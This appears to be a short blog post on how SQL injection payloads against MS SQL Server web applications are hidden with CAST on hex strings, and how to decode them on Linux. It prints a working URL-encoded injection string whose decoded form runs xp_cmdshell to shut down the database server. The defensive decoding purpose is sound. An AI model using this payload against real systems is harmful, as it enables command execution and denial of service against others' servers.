decoding sql injection attempts


SQL Server has a function called CAST, that converts an ASCII codes array to text. Hackers can use this function to obfuscate the SQL Injection payload, and bypass filters that block SQL commands or hazardous characters.
Here is an example to an attack that uses this technique:

SET @S=CAST(0x The ASCII Code Array) AS CHAR(4000));

The first step is to declare a variable that will contain the attack payload.
The second step is to set the variable with the payload, which is obfuscated and decoded using the CAST funciton.
In the third step, the payload is executed.

Sample Exploit

The following payload shuts down the Database server by executing the command ” exec master..xp_cmdshell ‘shutdown -f’ ” :

';DECLARE%[email protected]%20NVARCHAR(4000);SET%[email protected]=CAST(0×650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(4000));EXEC(@S);

Affected Products
MS SQL based web applications.

Let’s start decoding sql injection attempts



To Decode (on linux)

# echo "0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700" | xxd -r -p

This yields our payload:

exec master..xp_cmdshell 'shutdown -f'

Leave a Reply

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four 
    spaces will be stripped off, but all other whitespace
    will be preserved.
    Markdown is turned off in code blocks:
     [This is not a link](

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>